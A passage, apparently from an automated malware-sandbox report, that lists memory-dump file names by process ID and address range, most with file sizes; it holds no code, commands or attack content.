                    Filesize

                    6.9MB

                  • memory/968-266-0x0000000006340000-0x0000000006341000-memory.dmp
                    Filesize

                    4KB

                  • memory/968-37-0x00000000025F0000-0x00000000025F1000-memory.dmp
                    Filesize

                    4KB

                  • memory/968-28-0x0000000000000000-mapping.dmp
                  • memory/968-38-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1116-268-0x0000000000000000-mapping.dmp
                  • memory/1252-17-0x0000000000000000-mapping.dmp
                  • memory/1252-34-0x0000000071AB0000-0x000000007219E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1280-49-0x0000000004780000-0x0000000004781000-memory.dmp
                    Filesize

                    4KB

                  • memory/1280-19-0x0000000000000000-mapping.dmp
                  • memory/1280-209-0x00000000065E0000-0x00000000065E1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1280-207-0x0000000006590000-0x0000000006591000-memory.dmp
                    Filesize

                    4KB

                  • memory/1280-36-0x0000000071AB0000-0x000000007219E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1348-24-0x0000000000000000-mapping.dmp
                  • memory/1460-175-0x0000000006830000-0x0000000006831000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-84-0x00000000064B0000-0x00000000064B1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-76-0x0000000005810000-0x0000000005811000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-69-0x0000000006390000-0x0000000006391000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-147-0x00000000065E0000-0x00000000065E1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-68-0x0000000005910000-0x0000000005911000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-63-0x0000000005860000-0x0000000005861000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-55-0x0000000005480000-0x0000000005481000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-173-0x00000000067E0000-0x00000000067E1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1460-18-0x0000000000000000-mapping.dmp
                  • memory/1460-33-0x0000000071AB0000-0x000000007219E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1556-350-0x0000000000000000-mapping.dmp
                  • memory/1560-16-0x0000000000000000-mapping.dmp
                  • memory/1608-284-0x000000000041A684-mapping.dmp
                  • memory/1608-282-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/1608-286-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/1620-252-0x00000000003F0000-0x00000000003F1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1620-248-0x0000000071AB0000-0x000000007219E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1620-250-0x0000000000DD0000-0x0000000000DD1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1620-274-0x0000000000480000-0x00000000004A4000-memory.dmp
                    Filesize

                    144KB

                  • memory/1620-246-0x0000000000000000-mapping.dmp
                  • memory/1628-15-0x0000000000000000-mapping.dmp
                  • memory/1768-27-0x0000000000000000-mapping.dmp
                  • memory/1768-32-0x0000000071AB0000-0x000000007219E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1792-20-0x0000000000000000-mapping.dmp
                  • memory/1792-35-0x0000000071AB0000-0x000000007219E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1812-11-0x0000000000000000-mapping.dmp
                  • memory/1832-10-0x0000000000000000-mapping.dmp
                  • memory/1840-361-0x0000000000910000-0x0000000000913000-memory.dmp
                    Filesize

                    12KB

                  • memory/1840-340-0x0000000000000000-mapping.dmp
                  • memory/1840-346-0x0000000073BA0000-0x000000007428E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1840-347-0x0000000000980000-0x0000000000981000-memory.dmp
                    Filesize

                    4KB

                  • memory/1840-351-0x0000000000440000-0x0000000000441000-memory.dmp
                    Filesize

                    4KB

                  • memory/1840-360-0x00000000008F0000-0x0000000000901000-memory.dmp
                    Filesize

                    68KB

                  • memory/1864-289-0x0000000000000000-mapping.dmp
                  • memory/1876-235-0x00000000007B0000-0x0000000000801000-memory.dmp
                    Filesize

                    324KB

                  • memory/1876-201-0x0000000071AB0000-0x000000007219E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1876-206-0x0000000000FA0000-0x0000000000FA1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-213-0x0000000000400000-0x0000000000401000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-198-0x0000000000000000-mapping.dmp
                  • memory/1932-0-0x0000000000000000-mapping.dmp
                  • memory/1940-4-0x0000000000000000-mapping.dmp
                  • memory/1940-5-0x0000000000000000-mapping.dmp
                  • memory/1984-8-0x0000000000000000-mapping.dmp
                  • memory/1992-634-0x0000000000000000-mapping.dmp
                  • memory/2012-26-0x0000000000000000-mapping.dmp
                  • memory/2040-13-0x0000000000000000-mapping.dmp
                  • memory/2056-358-0x0000000000000000-mapping.dmp
                  • memory/2180-386-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                    Filesize

                    304KB

                  • memory/2180-332-0x0000000000000000-mapping.dmp
                  • memory/2180-628-0x0000000050480000-0x000000005049A000-memory.dmp
                    Filesize

                    104KB

                  • memory/2252-545-0x0000000000000000-mapping.dmp
                  • memory/2252-557-0x0000000000000000-mapping.dmp
                  • memory/2252-630-0x0000000000000000-mapping.dmp
                  • memory/2252-629-0x0000000003C80000-0x0000000003C81000-memory.dmp
                    Filesize

                    4KB

                  • memory/2252-627-0x0000000000000000-mapping.dmp
                  • memory/2252-625-0x0000000000000000-mapping.dmp
                  • memory/2252-467-0x0000000000000000-mapping.dmp
                  • memory/2252-623-0x0000000000000000-mapping.dmp
                  • memory/2252-621-0x0000000000000000-mapping.dmp
                  • memory/2252-619-0x0000000000000000-mapping.dmp
                  • memory/2252-617-0x0000000000000000-mapping.dmp
                  • memory/2252-615-0x0000000000000000-mapping.dmp
                  • memory/2252-613-0x0000000000000000-mapping.dmp
                  • memory/2252-611-0x0000000000000000-mapping.dmp
                  • memory/2252-609-0x0000000000000000-mapping.dmp
                  • memory/2252-607-0x0000000000000000-mapping.dmp
                  • memory/2252-605-0x0000000000000000-mapping.dmp
                  • memory/2252-603-0x0000000000000000-mapping.dmp
                  • memory/2252-601-0x0000000000000000-mapping.dmp
                  • memory/2252-599-0x0000000000000000-mapping.dmp
                  • memory/2252-597-0x0000000000000000-mapping.dmp
                  • memory/2252-595-0x0000000000000000-mapping.dmp
                  • memory/2252-593-0x0000000000000000-mapping.dmp
                  • memory/2252-591-0x0000000000000000-mapping.dmp
                  • memory/2252-589-0x0000000000000000-mapping.dmp
                  • memory/2252-587-0x0000000000000000-mapping.dmp
                  • memory/2252-585-0x0000000000000000-mapping.dmp
                  • memory/2252-583-0x0000000000000000-mapping.dmp
                  • memory/2252-581-0x0000000000000000-mapping.dmp
                  • memory/2252-579-0x0000000000000000-mapping.dmp
                  • memory/2252-577-0x0000000000000000-mapping.dmp
                  • memory/2252-575-0x0000000000000000-mapping.dmp
                  • memory/2252-573-0x0000000000000000-mapping.dmp
                  • memory/2252-571-0x0000000000000000-mapping.dmp
                  • memory/2252-569-0x0000000000000000-mapping.dmp
                  • memory/2252-567-0x0000000000000000-mapping.dmp
                  • memory/2252-565-0x0000000000000000-mapping.dmp
                  • memory/2252-563-0x0000000000000000-mapping.dmp
                  • memory/2252-561-0x0000000000000000-mapping.dmp
                  • memory/2252-471-0x0000000000000000-mapping.dmp
                  • memory/2252-555-0x0000000000000000-mapping.dmp
                  • memory/2252-553-0x0000000000000000-mapping.dmp
                  • memory/2252-551-0x0000000000000000-mapping.dmp
                  • memory/2252-549-0x0000000000000000-mapping.dmp
                  • memory/2252-547-0x0000000000000000-mapping.dmp
                  • memory/2252-543-0x0000000000000000-mapping.dmp
                  • memory/2252-541-0x0000000000000000-mapping.dmp
                  • memory/2252-388-0x00000000000A0000-0x00000000000A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2252-389-0x0000000000000000-mapping.dmp
                  • memory/2252-390-0x0000000000160000-0x0000000000161000-memory.dmp
                    Filesize

                    4KB

                  • memory/2252-391-0x0000000000000000-mapping.dmp
                  • memory/2252-393-0x0000000000000000-mapping.dmp
                  • memory/2252-395-0x0000000000000000-mapping.dmp
                  • memory/2252-397-0x0000000000000000-mapping.dmp
                  • memory/2252-399-0x0000000000000000-mapping.dmp
                  • memory/2252-401-0x0000000000000000-mapping.dmp
                  • memory/2252-403-0x0000000000000000-mapping.dmp
                  • memory/2252-405-0x0000000000000000-mapping.dmp
                  • memory/2252-407-0x0000000000000000-mapping.dmp
                  • memory/2252-409-0x0000000000000000-mapping.dmp
                  • memory/2252-411-0x0000000000000000-mapping.dmp
                  • memory/2252-413-0x0000000000000000-mapping.dmp
                  • memory/2252-415-0x0000000000000000-mapping.dmp
                  • memory/2252-417-0x0000000000000000-mapping.dmp
                  • memory/2252-419-0x0000000000000000-mapping.dmp
                  • memory/2252-421-0x0000000000000000-mapping.dmp
                  • memory/2252-423-0x0000000000000000-mapping.dmp
                  • memory/2252-425-0x0000000000000000-mapping.dmp
                  • memory/2252-427-0x0000000000000000-mapping.dmp
                  • memory/2252-429-0x0000000000000000-mapping.dmp
                  • memory/2252-431-0x0000000000000000-mapping.dmp
                  • memory/2252-433-0x0000000000000000-mapping.dmp
                  • memory/2252-435-0x0000000000000000-mapping.dmp
                  • memory/2252-437-0x0000000000000000-mapping.dmp
                  • memory/2252-439-0x0000000000000000-mapping.dmp
                  • memory/2252-441-0x0000000000000000-mapping.dmp
                  • memory/2252-443-0x0000000000000000-mapping.dmp
                  • memory/2252-445-0x0000000000000000-mapping.dmp
                  • memory/2252-447-0x0000000000000000-mapping.dmp
                  • memory/2252-449-0x0000000000000000-mapping.dmp
                  • memory/2252-451-0x0000000000000000-mapping.dmp
                  • memory/2252-453-0x0000000000000000-mapping.dmp
                  • memory/2252-455-0x0000000000000000-mapping.dmp
                  • memory/2252-457-0x0000000000000000-mapping.dmp
                  • memory/2252-459-0x0000000000000000-mapping.dmp
                  • memory/2252-461-0x0000000000000000-mapping.dmp
                  • memory/2252-463-0x0000000000000000-mapping.dmp
                  • memory/2252-465-0x0000000000000000-mapping.dmp
                  • memory/2252-539-0x0000000000000000-mapping.dmp
                  • memory/2252-513-0x0000000000000000-mapping.dmp
                  • memory/2252-559-0x0000000000000000-mapping.dmp
                  • memory/2252-473-0x0000000000000000-mapping.dmp
                  • memory/2252-475-0x0000000000000000-mapping.dmp
                  • memory/2252-477-0x0000000000000000-mapping.dmp
                  • memory/2252-479-0x0000000000000000-mapping.dmp
                  • memory/2252-481-0x0000000000000000-mapping.dmp
                  • memory/2252-483-0x0000000000000000-mapping.dmp
                  • memory/2252-485-0x0000000000000000-mapping.dmp
                  • memory/2252-487-0x0000000000000000-mapping.dmp
                  • memory/2252-489-0x0000000000000000-mapping.dmp
                  • memory/2252-491-0x0000000000000000-mapping.dmp
                  • memory/2252-493-0x0000000000000000-mapping.dmp
                  • memory/2252-495-0x0000000000000000-mapping.dmp
                  • memory/2252-497-0x0000000000000000-mapping.dmp
                  • memory/2252-499-0x0000000000000000-mapping.dmp
                  • memory/2252-501-0x0000000000000000-mapping.dmp
                  • memory/2252-503-0x0000000000000000-mapping.dmp
                  • memory/2252-505-0x0000000000000000-mapping.dmp
                  • memory/2252-507-0x0000000000000000-mapping.dmp
                  • memory/2252-509-0x0000000000000000-mapping.dmp
                  • memory/2252-511-0x0000000000000000-mapping.dmp
                  • memory/2252-469-0x0000000000000000-mapping.dmp
                  • memory/2252-515-0x0000000000000000-mapping.dmp
                  • memory/2252-517-0x0000000000000000-mapping.dmp
                  • memory/2252-519-0x0000000000000000-mapping.dmp
                  • memory/2252-521-0x0000000000000000-mapping.dmp
                  • memory/2252-523-0x0000000000000000-mapping.dmp
                  • memory/2252-525-0x0000000000000000-mapping.dmp
                  • memory/2252-527-0x0000000000000000-mapping.dmp
                  • memory/2252-529-0x0000000000000000-mapping.dmp
                  • memory/2252-531-0x0000000000000000-mapping.dmp
                  • memory/2252-533-0x0000000000000000-mapping.dmp
                  • memory/2252-535-0x0000000000000000-mapping.dmp
                  • memory/2252-537-0x0000000000000000-mapping.dmp
                  • memory/2280-300-0x000000000043FCC3-mapping.dmp
                  • memory/2344-202-0x00000000024C0000-0x00000000024C4000-memory.dmp
                    Filesize

                    16KB

                  • memory/2344-188-0x0000000000000000-mapping.dmp
                  • memory/2360-193-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/2360-190-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/2360-191-0x000000000043FCC3-mapping.dmp
                  • memory/2412-635-0x0000000000000000-mapping.dmp
                  • memory/2468-292-0x0000000000000000-mapping.dmp
                  • memory/2508-632-0x0000000000000000-mapping.dmp
                  • memory/2564-102-0x0000000000000000-mapping.dmp
                  • memory/2584-277-0x0000000000000000-mapping.dmp
                  • memory/2584-109-0x0000000071AB0000-0x000000007219E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2584-104-0x0000000000000000-mapping.dmp
                  • memory/2584-189-0x0000000000AF0000-0x0000000000AFD000-memory.dmp
                    Filesize

                    52KB

                  • memory/2584-110-0x0000000000C70000-0x0000000000C71000-memory.dmp
                    Filesize

                    4KB

                  • memory/2584-174-0x0000000004B90000-0x0000000004C40000-memory.dmp
                    Filesize

                    704KB

                  • memory/2628-638-0x00000000000D0000-0x00000000000D1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2628-637-0x0000000000000000-mapping.dmp
                  • memory/2628-636-0x0000000000090000-0x0000000000091000-memory.dmp
                    Filesize

                    4KB

                  • memory/2652-157-0x000007FEF8560000-0x000007FEF87DA000-memory.dmp
                    Filesize

                    2.5MB

                  • memory/2668-234-0x0000000000000000-mapping.dmp
                  • memory/2672-115-0x0000000000000000-mapping.dmp
                  • memory/2700-119-0x0000000000000000-mapping.dmp
                  • memory/2744-126-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/2744-128-0x0000000000417A8B-mapping.dmp
                  • memory/2744-133-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/2764-131-0x000000000043FCC3-mapping.dmp
                  • memory/2764-135-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/2764-130-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/2824-233-0x0000000000000000-mapping.dmp
                  • memory/2828-144-0x0000000000400000-0x0000000000425000-memory.dmp
                    Filesize

                    148KB

                  • memory/2828-140-0x000000000041A684-mapping.dmp
                  • memory/2828-139-0x0000000000400000-0x0000000000425000-memory.dmp
                    Filesize

                    148KB

                  • memory/2832-329-0x0000000000E90000-0x0000000000E91000-memory.dmp
                    Filesize

                    4KB

                  • memory/2832-328-0x0000000073BA0000-0x000000007428E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2832-377-0x0000000000940000-0x0000000000964000-memory.dmp
                    Filesize

                    144KB

                  • memory/2832-375-0x0000000000720000-0x0000000000743000-memory.dmp
                    Filesize

                    140KB

                  • memory/2832-325-0x0000000000000000-mapping.dmp
                  • memory/2836-343-0x0000000000000000-mapping.dmp
                  • memory/2932-323-0x0000000000000000-mapping.dmp
                  • memory/2972-364-0x0000000004BC0000-0x0000000004BC2000-memory.dmp
                    Filesize

                    8KB

                  • memory/2972-338-0x0000000073BA0000-0x000000007428E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2972-348-0x0000000000290000-0x0000000000291000-memory.dmp
                    Filesize

                    4KB

                  • memory/2972-355-0x0000000000270000-0x0000000000280000-memory.dmp
                    Filesize

                    64KB

                  • memory/2972-354-0x0000000004BC0000-0x0000000004BC2000-memory.dmp
                    Filesize

                    8KB

                  • memory/2972-335-0x0000000000000000-mapping.dmp
                  • memory/2972-341-0x0000000000350000-0x0000000000351000-memory.dmp
                    Filesize

                    4KB

                  • memory/2972-353-0x00000000004D0000-0x00000000004D5000-memory.dmp
                    Filesize

                    20KB

                  • memory/2972-352-0x00000000003B0000-0x00000000003C2000-memory.dmp
                    Filesize

                    72KB

                  • memory/3004-310-0x0000000000417A8B-mapping.dmp
                  • memory/3004-315-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/3032-249-0x00000000028C0000-0x00000000028C4000-memory.dmp
                    Filesize

                    16KB

                  • memory/3032-236-0x0000000000000000-mapping.dmp
                  • memory/3048-240-0x0000000000417A8B-mapping.dmp
                  • memory/3048-242-0x0000000000400000-0x0000000000434000-memory.dmp
                    Filesize

                    208KB

                  • memory/3048-239-0x0000000000400000-0x0000000000434000-memory.dmp
                    Filesize

                    208KB